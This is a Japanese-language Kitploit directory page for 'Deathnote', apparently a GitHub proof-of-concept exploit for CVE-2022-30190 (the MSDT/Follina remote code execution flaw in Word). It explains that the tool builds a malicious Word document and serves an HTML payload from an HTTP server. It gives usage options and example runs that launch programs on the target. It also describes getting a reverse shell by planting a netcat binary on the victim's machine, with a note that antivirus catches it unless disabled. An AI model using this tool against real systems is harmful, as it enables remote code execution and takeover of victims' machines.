Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Deathnote — CVE-2022-30190の概念実証 | Kitploit
ツール/GitHubGitHub/malwareman007/deathnote
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubmalwareman007/deathnote

Deathnote

CVE-2022-30190の概念実証

リポジトリを見る
3863年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Deathnote

CVE-2022-30190 の概念実証

MSDT が Word などの呼び出し元アプリケーションから URL プロトコルを使用して呼び出されると、リモートコード実行の脆弱性が存在します。この脆弱性の悪用に成功した攻撃者は、呼び出し元アプリケーションの権限で任意のコードを実行できます。その後、攻撃者はプログラムのインストール、データの表示、変更、削除、またはユーザーの権限で許可されたコンテキストでの新しいアカウントの作成を行うことができます。


悪意のある Microsoft Word 文書を使用して「Deathnote」MS-MSDT 攻撃を作成し、HTTP サーバーでペイロードをステージングします。

使用方法

root@kitploit:~
usage: follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]

options:
  -h, --help            show this help message and exit
  --command COMMAND, -c COMMAND
                        command to run on the target (default: Notepad)
  --output OUTPUT, -o OUTPUT
                        output maldoc file (default: ./Deathnote.doc)
  --interface INTERFACE, -i INTERFACE
                        network interface or IP address to host the HTTP server (default: eth0)
  --port PORT, -p PORT  port to serve the HTTP server (default: 8000)

使用例

notepad.exe を起動:

root@kitploit:~
$ python3 Deathnote.py   
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./Deathnote.doc
[+] serving html payload on :8000

calc.exe を起動:

root@kitploit:~
$ python3 Deathnote.py -c "calc"

demo

ポート 4444 でリバースシェルを取得します。注: これにより、netcat バイナリが 被害者のマシン上に ダウンロードされ、C:\Windows\Tasks に配置されます。バイナリはクリーンアップされません。AV が無効でない限り、これによりアンチウイルス検出がトリガーされます。

reverse shell を取得:

root@kitploit:~
python3 Deathnote.py -p 1234
ツールをダウンロード